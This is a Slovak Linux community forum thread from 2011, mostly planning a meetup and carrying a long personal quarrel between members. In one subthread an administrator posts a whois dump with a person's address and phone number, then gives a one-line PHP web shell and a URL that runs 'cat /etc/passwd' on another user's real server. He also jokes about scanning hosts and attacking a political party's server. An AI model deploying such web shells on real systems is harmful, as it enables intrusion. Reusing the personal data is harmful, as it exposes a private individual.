Máme radi LinuxOS

Sekcia: Komunita 12.08.2011 | 15:04
Avatar bedňa LegacyIce-antiX  Administrátor
Kľudne to zmažte, ale nedalo mi mám vás všetkých rád a budem rád keď tu moji priatelia budú v pohode nažívať s mojimi priateľmi a zabudnú na to čo už dávno všetci zabudli. Tak by sme mohli oficiálne s požehnaním LinuxOS, alebo neoficiálne spraviť stretko, navrhujem neutrálnu pôdu v centre Slovenska, aby to všetci mali rovnako ďaleko :) To blaváci asi neprídu, pretože sú zvyknutý, že je to stred vesmíru, alebo sa mýlim? :) Samozrejme sú vítané spriatelené LINUXOVÉ a OpenSource weby.
Táto správa neobsahuje vírus, pretože nepoužívam MS Windows. http://kernelultras.org
    • Re: Máme radi LinuxOS 12.08.2011 | 15:14
      Avatar Stanislav Hoferek Greenie 18.04  Používateľ
      Stred vesmíru je na záhorí, to nevieš? :)

      Rád by som prišiel. V strede je alebo Banská Bystrica, alebo Liptovský Mikuláš.

      Inak o weby podľa mňa nejde, skôr o ľudí, však weby sú vlastne len zoskupenia ľudí a možnosti komunikácie medzi nimi :)
      • Re: Máme radi LinuxOS 12.08.2011 | 15:17
        Avatar m4jkl   Používateľ
        Stred vesmíru je na záhorí, to nevieš? :)
        a Skalica je pjekne mjesto :)
      • Re: Máme radi LinuxOS 12.08.2011 | 15:20
        Avatar bedňa LegacyIce-antiX  Administrátor
        Tak ja som to myslel, že by sa táto myšlienka zverejnila aj na iných weboch, aby sa ľudia o tom dozvedeli a či budú mať záujem. Myslím že posedenie pri jednom stole by zblížilo ľudí a zabudlo sa na nejaké tie žabo myšie rozpory.
        Táto správa neobsahuje vírus, pretože nepoužívam MS Windows. http://kernelultras.org
    • Re: Máme radi LinuxOS 12.08.2011 | 16:12
      Avatar Róbert Dúbravský PC Debian alebo Ubuntu - servery Debian  Používateľ
      Ahoj,
      Dosť veľká šanca bola OSS CONF v Žiline, človek sa mohol stretnúť a aj niečo vidieť. Poloha tiež nie zlá. Nápad je to dobrý to stretko, len aby niekto aj reálne prišiel. Ja osobne som si "voľnú kartu" minul návštevou Žiliny. Predsa som bol preč celý deň. Sme sa tam stretli chalani s LinuxON. Síce minulý rok bol OSSCONF väčší ako tento rok, návštevu neľutujem. Škoda že tam nebolo viac ľuďí, myslel som že tam stretneme chalanov aj odtiaľto. Škoda.
      • Re: Máme radi LinuxOS 13.08.2011 | 01:07
        Avatar bedňa LegacyIce-antiX  Administrátor
        Čau. pracoval som na veciach, ktoré som chcel dokončiť a nejak som ignoroval výzvy, teraz viem že to bola chyba a pri najbližšom náznaku stretka som tam :)
        Táto správa neobsahuje vírus, pretože nepoužívam MS Windows. http://kernelultras.org
    • Re: Máme radi LinuxOS 12.08.2011 | 16:18
      Avatar borg Fedora  Administrátor
      zorganizuj slovensky zajazdovy autobus na linuxalt v novembri :)
      • Re: Máme radi LinuxOS 12.08.2011 | 16:20
        Avatar Róbert Dúbravský PC Debian alebo Ubuntu - servery Debian  Používateľ
        Vieš o tom že si trafil? Na LinuxAlt by som rád išiel.
        • Re: Máme radi LinuxOS 12.08.2011 | 16:23
          Avatar borg Fedora  Administrátor
          tiez rozmyslam. ide mi tam priamo vlak, nejakych 2hodky. tak este uvidim.
          • Re: Máme radi LinuxOS 12.08.2011 | 16:34
            Avatar Stanislav Hoferek Greenie 18.04  Používateľ
            pridávam sa. geniálna akcia
            • Re: Máme radi LinuxOS 12.08.2011 | 19:29
              Avatar bedňa LegacyIce-antiX  Administrátor
              OK som za LinuxAlt, až sa nič mimoriadne nestane, budem tam.
              Táto správa neobsahuje vírus, pretože nepoužívam MS Windows. http://kernelultras.org
              • Re: Máme radi LinuxOS 13.08.2011 | 13:36
                Avatar Fridolín Pokorný Fedora 21  Používateľ
                Na linuxalte budem, pomaly uz tradicne, na 99% aj ja. Ak sa nieco posklada, dajte mi vediet ;)
    • Re: Máme radi LinuxOS 12.08.2011 | 17:05
      Avatar Stanislav Hoferek Greenie 18.04  Používateľ
      inak veľmi si vážim, čo si napísal. Škoda, že nie každý má toľko ľudskosti, ako ty.
      • Re: Máme radi LinuxOS 12.08.2011 | 19:41
        Avatar bedňa LegacyIce-antiX  Administrátor
        Ja som hardcore čo sa týka Linuxu a Open Source, Nemám problém vypustiť nadávku pri sporoch slobodný, closet(d) softvér, ale vážim si spolubojovníkov a Edo sorry, vyhrabávať historické zápisky po zmieri mi nepripadá fér, v tomto sa prikláňam na Stanovu stranu ktorý ti podal ruku na zmier. Citácia Stano Hoferek 30.07.2011 02:22:
        Podávam tuto Edovi ruku na zmierenie a po pravde som veľmi zvedavý, čo na to odpíše.
        Možno stratím priateľa, ale radšej by som bol, keby sme ten svet nevideli čiernobielo.
        Táto správa neobsahuje vírus, pretože nepoužívam MS Windows. http://kernelultras.org
    • Re: Máme radi LinuxOS 12.08.2011 | 20:22
      Avatar default Debian  Používateľ
      ja mam rad linuxos.sk, pomohol mi velmy, naucil som sa pouzivat linux a dal mi napady, a vdaka nemu mam vela zalub, ako programovanie, bavkanie sa s distrami a grafika, navnadil ma na spravnu cestu, a ovplivnil aj moj vyber skoly, dakujem,a samozrejme dalsi ludi ako Dare Devil mi moc pomohli pri praci s linuxom aj webmy
      R.K
      • Re: Máme radi LinuxOS 12.08.2011 | 20:33
        Avatar bedňa LegacyIce-antiX  Administrátor
        Ty si z úplne iného filmu :) Keby bola cena za naj Linux nováčika, hlasujem za teba a držím palce.
        Táto správa neobsahuje vírus, pretože nepoužívam MS Windows. http://kernelultras.org
        • Re: Máme radi LinuxOS 12.08.2011 | 20:37
          Avatar default Debian  Používateľ
          dakujem, vdaka vam mi bezi aj moj server novy, tak sa tesim teraz z neho :D
          R.K
          • Re: Máme radi LinuxOS 12.08.2011 | 20:46
            Avatar bedňa LegacyIce-antiX  Administrátor
            Tú radosť s tebou zdieľam, viem o čom píšeš, ak tam máš dôležité dáta nezabudni zálohovať :)
            Táto správa neobsahuje vírus, pretože nepoužívam MS Windows. http://kernelultras.org
            • Re: Máme radi LinuxOS 12.08.2011 | 20:52
              Avatar default Debian  Používateľ
              zatial tam mam len taky testovaci dialog, len aby tam daco bolo tu sa to nachadza , neskor tam chystam premiestnit cast svojho webu tu, je to webove ulozisko, mam tam nakodeny v php system na uploadovanie a zdielanie suborov, potom chystam nieco podobne so svojim serverom, ale aj vytvaranie projektov, a aby mohli ludia hned to kukat a upravovat, hadam mi to nehakne daky indicky terorista :D
              R.K
            • Re: Máme radi LinuxOS 12.08.2011 | 20:56
              Avatar default Debian  Používateľ
              bedna ak hladas priecinok kde mam subory tak /temp , ;) REQS REQ/S KB KB/S URL
              1 0.17 0.5 0.1*/usr
              1 1.00 0.5 0.5 /rado
              R.K
              • Re: Máme radi LinuxOS 12.08.2011 | 21:07
                Avatar bedňa LegacyIce-antiX  Administrátor
                Hľadal som :)

                inetnum: 188.123.104.0 - 188.123.105.255
                netname: SK-IMAFEX
                descr: Imafex resident users Ruzomberok
                country: SK
                admin-c: SK4529-RIPE
                tech-c: SK4529-RIPE
                status: ASSIGNED PA
                mnt-by: IMAFEX-MNT
                source: RIPE # Filtered

                person: Stanislav Kalousek
                address: Nabr. A. Stodolu 1799/65
                address: 031 01 Liptovsky Mikulas
                address: Slovakia
                phone: +421 905 440 232
                nic-hdl: SK4529-RIPE
                source: RIPE # Filtered
                mnt-by: ARTOS-MNT

                % Information related to '188.123.96.0/19AS5578'

                route: 188.123.96.0/19
                descr: IMAFEX
                origin: AS5578
                mnt-by: IMAFEX-MNT
                mnt-by: GTSSK-MNT
                mnt-by: ARTOS-MNT
                source: RIPE # Filtered
                Táto správa neobsahuje vírus, pretože nepoužívam MS Windows. http://kernelultras.org
                • Re: Máme radi LinuxOS 12.08.2011 | 21:13
                  Avatar default Debian  Používateľ
                  zaujimave informacie , to ani ja neviem o nich :D
                  R.K
                  • Re: Máme radi LinuxOS 12.08.2011 | 21:20
                    Avatar bedňa LegacyIce-antiX  Administrátor
                    To je len whois 188.123.104.133, škoda že za nmap dáva T-COM bany, tak zatiaľ si v bezpečí :) Ozaj neviete prečo to T-COM robí, mám s tým problém už asi rok, keď chcem niekoho hacknúť :)
                    Táto správa neobsahuje vírus, pretože nepoužívam MS Windows. http://kernelultras.org
                    • Re: Máme radi LinuxOS 12.08.2011 | 21:21
                      Avatar default Debian  Používateľ
                      ja nemam net od tcomu
                      R.K
                      • Re: Máme radi LinuxOS 12.08.2011 | 21:29
                        Avatar bedňa LegacyIce-antiX  Administrátor
                        Ja necrackujem, len skúsim nejaký hack či neprejde a poradím ako sa zabezpečiť, odkedy mi nejde nmap (alebo len čiastočne), moc toho nezmôžem, neviem či to majú všetci, alebo mám toho banána len ja odkedy som chcel dať dole server istej politickej strany :) Niekedy stačí nmap alebo nmap -PN a mám tak na dve tri minúty banán a som mimo internet.
                        Táto správa neobsahuje vírus, pretože nepoužívam MS Windows. http://kernelultras.org
                        • Re: Máme radi LinuxOS 12.08.2011 | 21:33
                          Avatar default Debian  Používateľ
                          len ak sa ti podari dostat dnu nieze porobis nieco so sietov, aby som nemal problemi potom a neodpojili ma koli tomu :D , a uz som tam dal hosting, mozes si to skusit, dam ti ucet, meno: bedna , heslo heslo
                          R.K
                          • Re: Máme radi LinuxOS 12.08.2011 | 21:48
                            Avatar bedňa LegacyIce-antiX  Administrátor
                            Prosím ťa heslo nikdy nevystavuj verejne, páč niesme tu sami :)
                            Táto správa neobsahuje vírus, pretože nepoužívam MS Windows. http://kernelultras.org
                            • Re: Máme radi LinuxOS 12.08.2011 | 21:51
                              Avatar default Debian  Používateľ
                              tak ak mas jabber tak mi napis, heslo zmenim na ake budes chciet, jabber: radovan.kopca@jabbim.sk , ja mozem kazdemu doverovat nie :D , isto sa nikdo nepripoji a nebude uploadovat debiliny
                              R.K
                              • Re: Máme radi LinuxOS 12.08.2011 | 21:53
                                Avatar bedňa LegacyIce-antiX  Administrátor
                                Zbadá to tu Azurit a máš to vybielené, hackol Ábičko a skoro aj mňa dal dole :) Našťastie bol milosrdný :)
                                Táto správa neobsahuje vírus, pretože nepoužívam MS Windows. http://kernelultras.org
                                • Re: Máme radi LinuxOS 12.08.2011 | 21:56
                                  Avatar default Debian  Používateľ
                                  ok heslo stahujem dokym sa na nom nedohodneme, s azurita mam strach :D
                                  R.K
                                  • Re: Máme radi LinuxOS 12.08.2011 | 22:05
                                    Avatar bedňa LegacyIce-antiX  Administrátor
                                    Stačí tam uploadnuť php súbor s obsahom:
                                    <?
                                    shell_exec ( $_REQUEST["cmd"] )
                                    ?>

                                    A potom na začiatok sa pohrať:
                                    http://188.123.104.133/test.php?cmd=cat%20/etc/passwd
                                    atď.
                                    Táto správa neobsahuje vírus, pretože nepoužívam MS Windows. http://kernelultras.org
                                • Re: Máme radi LinuxOS 12.08.2011 | 22:34
                                  Avatar dodoedo Fedora Linux  Používateľ
                                  Chalani, pls. opatrne s týmito alfabetickými reťazcami ...

                                  Ď.
                                  G. Orwell: "Čím více se společnost vzdaluje od pravdy, tím více bude nenávidět ty, kteří ji říkají."
        • Re: Máme radi LinuxOS 12.08.2011 | 20:53
          Avatar Stanislav Hoferek Greenie 18.04  Používateľ
          ja mu nenapíšem tu na fóre nič. Po IM som ho tak vychválil, že musí meniť farby viac ako chameleón Mira Bendíka :)
    • Re: Máme radi LinuxOS 12.08.2011 | 21:17
      WlaSaTy   Návštevník
      : To blaváci asi neprídu, pretože sú zvyknutý, že je to stred vesmíru, alebo sa mýlim?

      Závisí od možností ubytovania ( pri viac dennom ) a od dopravy. Ale, v tom sa paštikári nelíšia od iných regióncov. Alebo som sa v niečom pomýlil?
      • Re: Máme radi LinuxOS 12.08.2011 | 21:21
        Avatar bedňa LegacyIce-antiX  Administrátor
        Líšia, my sme zvyknutý cestovať :)
        Táto správa neobsahuje vírus, pretože nepoužívam MS Windows. http://kernelultras.org
        • Re: Máme radi LinuxOS 12.08.2011 | 21:22
          Avatar default Debian  Používateľ
          ja tu v ruzomberku s BA vidim dakoho furt, po sildlisku :D
          R.K
          • Re: Máme radi LinuxOS 12.08.2011 | 21:30
            Avatar bedňa LegacyIce-antiX  Administrátor
            Aj kolega má značku BA a pritom býva inde, to je samý podvod :)
            Táto správa neobsahuje vírus, pretože nepoužívam MS Windows. http://kernelultras.org
            • Re: Máme radi LinuxOS 12.08.2011 | 21:51
              Avatar default Debian  Používateľ
              :D jaj to je akoze in mat znacku BA, hej?
              R.K
              • Re: Máme radi LinuxOS 15.08.2011 | 10:05
                Avatar Branislav Poldauf Manjaro, Debian stable  Používateľ
                neviem ci je to in, ale ked mas sidlo firmy v BA a kupis si firemne auto (odpis z dani) tak ho musis registrovat v BA a logicky dostanes bratislavku znacku
                Linux: the operating system with a CLUE... Command Line User Environment
          • Re: Máme radi LinuxOS 12.08.2011 | 21:42
            Avatar Stanislav Hoferek Greenie 18.04  Používateľ
            ty si z Liptova? :D
            • Re: Máme radi LinuxOS 12.08.2011 | 21:46
              Avatar default Debian  Používateľ
              ano
              R.K
        • Re: Máme radi LinuxOS 12.08.2011 | 21:29
          WlaSaTy   Návštevník
          Keď som bol posledne autobusom napríklad v Štiavnici, tak dostavník chodil 1 x denne. Nad ránom. Prišiel by si za takých podmienok?
          • Re: Máme radi LinuxOS 12.08.2011 | 21:31
            Avatar bedňa LegacyIce-antiX  Administrátor
            S tebou za akýchkoľvek :)
            Táto správa neobsahuje vírus, pretože nepoužívam MS Windows. http://kernelultras.org
            • Re: Máme radi LinuxOS 12.08.2011 | 22:03
              Avatar Stanislav Hoferek Greenie 18.04  Používateľ
              nemenovaný predseda SNS má súkromné lietadielko, možno by ho požičal :)
              • Re: Máme radi LinuxOS 12.08.2011 | 22:40
                Avatar dodoedo Fedora Linux  Používateľ
                Hoferek, prestaň vypisovať blbosti a zpoza-bučka posmech z druhého. Táto "poznámka" nemá nič spoločné s Témou, skľudni sa, až budeš kľudnou entitou ...
                G. Orwell: "Čím více se společnost vzdaluje od pravdy, tím více bude nenávidět ty, kteří ji říkají."
                • Re: Máme radi LinuxOS 12.08.2011 | 22:58
                  Avatar Stanislav Hoferek Greenie 18.04  Používateľ
                  mám ti napísať čo si o tebe myslím? Neurobím to. Ovládať sa viem, skús to aj ty.
                  • Re: Máme radi LinuxOS 12.08.2011 | 23:00
                    Avatar default Debian  Používateľ
                    musite kazdu temu vi dvaja napadat timto negativizmom, konecne normalna tema kde sa dalo zapojit, a zas toto
                    R.K
                    • Re: Máme radi LinuxOS 12.08.2011 | 23:05
                      Avatar Stanislav Hoferek Greenie 18.04  Používateľ
                      tak ako v 99% prípadov som to znovu nezačal, ale ukončím. Kde je dodoedo, tam je nemožné normálne komunikovať. Musí útočiť, naozaj musí, je to akési jeho poslanie.

                      To, že za menej ako mesiac urobil minimálne 3 zápisy vo fóre, ktorých jediný obsah bol "som lepší ako Hoferek", o ňom hovorí veľa. Ničí toto fórum, ničí dobré meno Linuxu a správa sa tak, že by sa 5 ročné decko v jeho koži poriadne hanbilo. Dáme anketu, kto má podobný názor? Alebo niekto vyhodí z fóra aj Dodoeda aj mňa? Aj to by bolo riešenie, aspoň by bol kľud. Ja by som bol za, lebo si vážim to, čo urobil Tomáš Srnka, Milan Dvorský a ďalší. Stavím sa, že on by bol proti. Ámen.
                  • Re: Máme radi LinuxOS 12.08.2011 | 23:02
                    Avatar dodoedo Fedora Linux  Používateľ
                    Hoferek, prestaň vypisovať blbosti a zpoza-bučka posmech z druhého. Táto "poznámka" nemá nič spoločné s Témou, skľudni sa, až budeš kľudnou entitou ...
                    G. Orwell: "Čím více se společnost vzdaluje od pravdy, tím více bude nenávidět ty, kteří ji říkají."
                    • Re: Máme radi LinuxOS 12.08.2011 | 23:06
                      Avatar Stanislav Hoferek Greenie 18.04  Používateľ
                      Dodoedo, prestaň vypisovať blbosti a zpoza-bučka posmech z druhého. Táto "poznámka" nemá nič spoločné s Témou, skľudni sa, až budeš kľudnou entitou ...
                      • Re: Máme radi LinuxOS 12.08.2011 | 23:11
                        Avatar default Debian  Používateľ
                        keby si bol lepsi ako on tak by sa sa nesnazil mu to vratit a kaslal na to, som jediny co chce mier ? :D
                        R.K
                        • Re: Máme radi LinuxOS 12.08.2011 | 23:16
                          Avatar Stanislav Hoferek Greenie 18.04  Používateľ
                          minimálne 10x som mu ponúkol mier. Alebo ho raz prijme, alebo ho k tomu niekto donúti. Viac ako 10x neustupujem nikomu, kto nemá najmenšiu chuť sa dohodnúť.

                          ak ho presvedčíš, aby ho prijal, budem ti veľmi vďačný.
                      • Re: Máme radi LinuxOS 12.08.2011 | 23:14
                        Avatar borg Fedora  Administrátor
                        ukludnite sa. uz som chcel tento subthread zmazat.
                      • Re: Máme radi LinuxOS 12.08.2011 | 23:24
                        Avatar dodoedo Fedora Linux  Používateľ
                        Ako je možné, že máš v sebe toľko sedliackej vzpurnej drzosti a stále útočíš na ľudí na portále, ktorý ta a tvoje Greenie zviditeľnil a kde si zažil aj tú najväčšiu hanbu za to, čo si popáchal ??!!
                        Naozaj si myslíš, že nemám objektívne právo upozorniť ostatných na to, čo píšeš o nás (a tak aj vlastne o linuxos.sk) po cudzích konkurenčných sajtoch ??
                        Choď si užiť svoj liek a neotravuj s takýmito primitívnosťami, bola tu (bedňa) napísaná celkom pozitívna téma, ktorú si okamžite "ogrcal" svojou jasnozrivou poznámkou o Slotovi a SNS a nás.

                        OK, tak ten súvisiaci blog:

                        Malá kritika linuxového internetového portálu. Jeden známy sa ma pýtal jednoduchú otázku - vraj načo som urobil druhý linuxový portál, keď už jeden existuje. Samozrejme som ho vyviedol z omylu. Však práca šéfredaktora alebo niečoho takého je skôr pre niekoho zodpovednejšieho ako som ja :) V diskusií padlo aj to, že prečo na starší portál nepíšem. Tak som teda napísal dôvody, ktoré boli hlavne o neporozumení si s konkrétnym človekom.

                        Po nejakom čase a tak trochu prehováraní zo strany iného kamaráta som sa rozhodol vrátiť. Bolo tam pár otázok začiatočníkov, teda pre mňa najobľúbenejšej "kasty" linuxákov. Kde som vedel pomôcť, tam som pomohol. Problém však nastal pri tom, čo som si prečítal správičku od autora Dodoedo. Ten ich píše hodne a prináša aktuálne informácie. Často však pridá nejaký ten "klenot", ktorý je hneď terčom oprávnenej kritiky. K tomu úplne neohrabané ochraňovanie "úplne odveci" myšlienky a už je oheň na svete.

                        Hlavný problém nie je diskusia. Fajn, ľudia majú odlišný názor, tak sa môžu navzájom niečo naučiť. Čo ale má robiť v diskusií cenzúra? Načo je dobré cenzurovať dobré názory? A akú má logiku napísať niečo typu:

                        Ahoj, "Tri pomlčky".

                        Vyzerá to ale tak, že jediný, kto tu vedie pivné reči o linuxos.sk si práve Ty.

                        Nie je pravda, že je jediný s tým názorom a fakt, že sa zakáže diskutovanie, len naštve toho človeka čo sa ozval i ostatných, ktorí s ním súhlasia. Ale tak dajme tomu, toto ešte človeka nejakom moc nevytočí. Ako je ale možné, že autor správičky zloženej z hodnotného obsahu a úplnej hovadiny na konci to dá potom ešte aj do fóra a ďalej rozoberá svoju teóriu o rogale? Ozval som sa do nej, a to nie kvôli tomu, že by mi bol človek s nickom troch pomlčiek či mínusov sympatický, no vyjadril dobrý názor a aj keď s ním úplne nesúhlasím, poukázal na problém.

                        Teraz bude nasledovať určite cenzurovanie aj obsahu na fóre a znovu sa to nechá s tým, že proti autorovi správičky nikto nič nemá. Je hanbou, že ak už nemá (ak dobre chápem) tento autor možnosť schvalovať správičky, tak ich niekto iný schvaluje bez čítania. Väčšia hanba je cenzúra a najväčšia je totálna neochota hľadania nejakého kompromisu. Nikto nie je bezchybný, a kto si myslí že áno, ten má viac "porúch osobnosti" ako ktokoľvek iný.
                        G. Orwell: "Čím více se společnost vzdaluje od pravdy, tím více bude nenávidět ty, kteří ji říkají."
                        • Re: Máme radi LinuxOS 12.08.2011 | 23:38
                          Avatar Stanislav Hoferek Greenie 18.04  Používateľ
                          Ahoj

                          1) Prečo ma stále považuješ za sedliaka? Pretože som z krásneho Liptova? A čo máš proti Liptovu? Stále útočíš.
                          2) Zviditeľnenie Greenie? Áno? Kde? Nie je to skôr zviditeľnenie teba? Ty píšeš správičky a útočíš na Hofereka. Robíš niečo iné? Neviem o tom. Potrebuješ sa stále zviditeľňovať.
                          3) Píšem niečo o "nás" ? Čo tým myslíš? Nájdi mi miesto, kde útočím na ľudí, ako je napríklad Tomáš Srnka. Neútočím, len bránim sa, no nie voči LinuxOS (sú tu super ľudia), ale proti tebe. Koľko krát si na mňa zaútočil? A čo si dosiahol? Nenávisť, fajn. Ešte niečo? Hmmm, už nič. Ak je cudzí sajt miesto, kde sú rovnakí alebo podobní ľudia, no nie sú tam ľudia ako ty, tak fajn, ber to za cudzí sajt.
                          4) Mojim liekom je napríklad pobyt na čerstvom vzduchu. Skús to aj ty. Je to dobrá vec, prečistí hlavu a lepšie sa rozmýšľa.
                          5) Bedňa je veľmi fajn človek. Poznám ho krátko, no zaslúžil si rešpekt viac ľudí.
                          6) Pri téme dopravy som pridal lietadlo. Sorry, ak to chápeš ako útok na teba. Pre mňa je lietadlo dopravný prostriedok a ak je slovo lietadlo nejaký útok na teba, tak sa ospravedlňujem. Nemám nič spoločné so Slotom, jeho lietadlom či jeho politickou stranou.
                          7) Na blogoch píšem jednoduché myšlienky. Nech sa páči, sprav si blog aj ty, ak po tom túžiš. Bez problémov akúkoľvek myšlienku vysvetlím.

                          V skratke napríklad poviem to, čo je v tomto napísané:

                          Spravovať portál je ťažké, nie je to pre hocikoho. Však preto to aj nerobím. Na Roote sú šikovný ľudia, na LinuxON, na LinuxOS a na rôznych ďalších stránkach tiež. Ďalej som tam napísal, že nemám rád cenzúru. Čokoľvek sa cenzuruje, dopadne väčšinou inak, ako sa zamýšľa. Cenzurovanie či zakrývanie pravdy v prospech hlúpostí akéhokoľvek kalibru je podľa mojich myšlienok zlé. Dlhodobo, mám ten názor ešte od čias, čo som napríklad ani o Linuxe nepočul.

                          Veľa krát si práve ty cenzuroval obsah, napríklad pri správičke. Ak príde správa typu:

                          "Vyšiel Giregox 8" a niekto napíše namiesto toho Firefox v diskusii pod článkom a ty ho nie len nevypočuješ, ale aj zmažeš, tak robíš podľa mňa nesprávnu vec. Cenzúru znášam ťažko a tak vidíš, naštve ma to a verejne napíšem, že si urobil chybu a naozaj ju nechceš napraviť. Nikto nie je bezchybný a ak si myslíš, že mazaním opravných riešení sa staneš dokonalým, tak s tým nesúhlasím.
                    • Re: Máme radi LinuxOS 12.08.2011 | 23:15
                      Avatar Stanislav Hoferek Greenie 18.04  Používateľ
                      toto máme spoločné:

                      1) obidvaja máme Linux
                      2) obidvoch nás zaujímajú patenty
                      3) obidvaja sa zaujímame o Android
                      4) obidvaja sme trvdohlavci
                      5) obidvaja sme na tomto fóre už dlho
                      6) obidvaja tu máme veľký počet príspevkov
                      7) obidvaja sa snažíme pomôcť začiatočníkom
                      ...

                      Napriek tomu vždy niečo nájdeš na mňa, nejakú blbosť, len aby si začal konflikt.

                      Čo s tým?

                      A) ja sa chcem dohodnúť, ty sa chceš dohodnúť, dohodneme sa
                      B) ja sa chcem dohodnúť, ty sa nechceš dohodnúť, tak sa skľudní hormón všade a bude kľud
                      C) ja sa chcem dohodnúť, ty neustále útočiť a tak budeš neustále útočiť. Aj tak nič nedosiahneš, no budeš stále pokračovať
                      D) ja sa chcem dohodnúť, no ešte 5x ma naštveš a už sa to zmení na "už sa s tebou nechcem dohodnúť"
                      E) zmažú teba, v prípade potreby zmažú mňa a bude kľud
                      F) začnem útočiť ja na teba, neustále dookola. Znížim sa na tvoju úroveň a budem zo seba robiť maximálneho hlupáka.

                      Vyber si čo chceš, ja som za A alebo B.
                      • Re: Máme radi LinuxOS 12.08.2011 | 23:33
                        Avatar dodoedo Fedora Linux  Používateľ
                        prečo sa tak úporne snažíš ma akokoľvek nasierať. Je to smiešne a nemá to význam. Ja nemám absolutne žiadny dôvod sa s tebou nejako vybavovať a už vôbec mi nestojíš za to, aby som sa nebodaj na liptovskú entitu hneval alebo sa tým zapodieval. Svoj názor som vyjadril tuná . Avšak záleží mi na tomto portáli natoľko, že nedovolím o ňom písať hlúposti a nepravdu a falošnosť som neznášal už od čias Jura Jánošíka.

                        dodoedo I.
                        G. Orwell: "Čím více se společnost vzdaluje od pravdy, tím více bude nenávidět ty, kteří ji říkají."
                        • Re: Máme radi LinuxOS 12.08.2011 | 23:42
                          Avatar Stanislav Hoferek Greenie 18.04  Používateľ
                          teba nasrať? Ja si prajem mier. Venovať sa niečomu zaujímavejšiemu ako hádkam.

                          Nemáš záujem? Výborne. tak nezakladaj témy o mne, nespúšťaj hlúpe výrazy atď.

                          Kľudne sa označuj za kinga Dodoeda prvého, to je tvoja vec. No skús naozaj s tou spomínanou hlúposťou sa ty nehrať na neviem koho. Otvorene si myslím, že ti nezáleží na portály. Ten by bol určite lepší, keby tu neboli hádky medzi dvomi ľuďmi s inými názormi. Takže ešte raz, nepáči sa mi tvoj prístup a nebude sa mi páčiť, kým ho trochu neupravíš. Priznaj, že si len človek, tak ako my všetci. A prestaň s tým Liptovom, To je naozaj hlboko pod úroveň kohokoľvek.
                        • Re: Máme radi LinuxOS 12.08.2011 | 23:45
                          Avatar Stanislav Hoferek Greenie 18.04  Používateľ
                          inak, odpovieš mi na niečo z toho? Alebo si tak nerozhodný, že musia za teba rozhodovať iní? Bedňa chce kľud, ja chcem kľud, Rado chce kľud, Borg chce kľud, koľko ľudí ešte potrebuješ? Urobil som to jednoduché, môžeš odpovedať bez akejkoľvek námahy. Rozmysli si to.
                        • Re: Máme radi LinuxOS 12.08.2011 | 23:48
                          Avatar bedňa LegacyIce-antiX  Administrátor
                          Edo to je viac ako rok starý článok odvtedy sa Stano snaží o uzmierenie, tak prosím podaj ruku, obaja ste tvrdohlavý a nechcite odo mňa aby som dával niekomu za pravdu, ja viem že každý máte svoju, tak budte frajeri a zabudnite čo bolo, lebo ma to fakt sere.
                          Táto správa neobsahuje vírus, pretože nepoužívam MS Windows. http://kernelultras.org
                          • Re: Máme radi LinuxOS 12.08.2011 | 23:52
                            Avatar Stanislav Hoferek Greenie 18.04  Používateľ
                            tak a teraz možnosti zase 2:

                            A) poriadne nasrať teba, Bedňa, a hromadu ďalších
                            B) správať sa ako ľudia, nie ako banda... ako sa to povie slušne? :)

                            Beriem B :)
                            • Re: Máme radi LinuxOS 13.08.2011 | 02:39
                              Avatar Milan Dvorský debian,mint kde,android  Administrátor
                              ach ako dobre, ze uz nepijem ... to by bolo hromadnych banov uz len z principu ... a ach ako dobre, ze uz nie som main adminom ... toto bola jedna z veci, ktora ma uz prestala skratka bavit ...
                              • Re: Máme radi LinuxOS 13.08.2011 | 09:04
                                Avatar default Debian  Používateľ
                                :D :D
                                R.K
                                • Re: Máme radi LinuxOS 13.08.2011 | 09:07
                                  Avatar default Debian  Používateľ
                                  podla mna bude klud az ked vznikne novy portal a bandy sa rozidu
                                  R.K
                                  • Re: Máme radi LinuxOS 13.08.2011 | 11:58
                                    Avatar Dare_devil Debian, OpenSuse  Používateľ
                                    Ked vobec nejaky vznikne ;)
                                    There is no flag large enough to cover the shame of killing innocent people
                                    • Re: Máme radi LinuxOS 13.08.2011 | 13:10
                                      Avatar dodoedo Fedora Linux  Používateľ
                                      Ď.
                                      G. Orwell: "Čím více se společnost vzdaluje od pravdy, tím více bude nenávidět ty, kteří ji říkají."
            • Re: Máme radi LinuxOS 13.08.2011 | 17:21
              WlaSaTy   Návštevník
              Myslím že by bolo asi rozumnejšie dať hlasovať za región a neskôr upresniť priestory, trvanie a možnosť ubytovania v prípade viac dennej akcie. Inak sa tých hádok človek nezbaví.
              • Re: Máme radi LinuxOS 13.08.2011 | 20:09
                Avatar borg Fedora  Administrátor
                hotovo
              • Re: Máme radi LinuxOS 13.08.2011 | 23:58
                Pelittimo   Návštevník
                Jedna baba povedala

                152 hlasov spolu, v kraji

                Košickom
                28 18.4%
                Trenčianskom
                25 16.4%
                Žilinskom
                25 16.4%
                Banskobystrickom
                19 12.5%
                Bratislavskom
                18 11.8%
                Nitrianskom
                15 9.9%
                Prešovskom
                13 8.6%
                Trnavskom
                9 5.9%
                • Re: Máme radi LinuxOS 14.08.2011 | 00:05
                  Avatar borg Fedora  Administrátor
                  odkial to mas? su to vysledky pre podobnu otazku v nedavnej minulosti?
                  • Re: Máme radi LinuxOS 14.08.2011 | 01:05
                    Pelittimo   Návštevník
                    http://www.linuxon.sk/component/poll/2-v-ktorom-kraji-by-vam-vyhovovali-podujatia-typu-linuxfest

                    Neviem kedy bola nahodena ale podobny typ to je. Ja by som z KE dosiel do stredu, do BA asi nie.
                    • Re: Máme radi LinuxOS 14.08.2011 | 10:29
                      Avatar Róbert Dúbravský PC Debian alebo Ubuntu - servery Debian  Používateľ
                      A šlaka, to je anketa od nás z LinuxON! To sme robili dávnejšie a len na skúšku, a nemusí byť objektívna. Dá sa ľahko ovplyvniť. A pozerám že aj táto tu sa dá takisto. Tak výsledky budú pravdepodobne odlišné. Ach jaj.... teraz to vyzerá že tu spamujeme našimi odkazmi.
                      • Re: Máme radi LinuxOS 14.08.2011 | 10:38
                        Avatar Stanislav Hoferek Greenie 18.04  Používateľ
                        normálny text a čísla k veci.

                        btw myslím, že je to tak trošičku zle vymyslené. naozaj veľa ľudí je na hraniciach medzi nejakými krajmi. Napríklad také Topoľčany sú v jednom kraji, no veľmi blízko sú tri ďalšie. Podobne napríklad Poprad.

                        Koľko je vhodných miest na stretko, to je ťažko povedať. Osobne si myslím, že tieto by boli vhodné:

                        1) Žilina
                        2) Považstká Bystrica
                        3) Liptovský Mikuláš/Ružomberok
                        4) Poprad
                        5) Spišská Nová Ves
                        6) Banská Bystrica/Zvolen/Žiar nad Hronom
                        7) Brezno
                        8 ) Lučenec, Rimavská Sobota
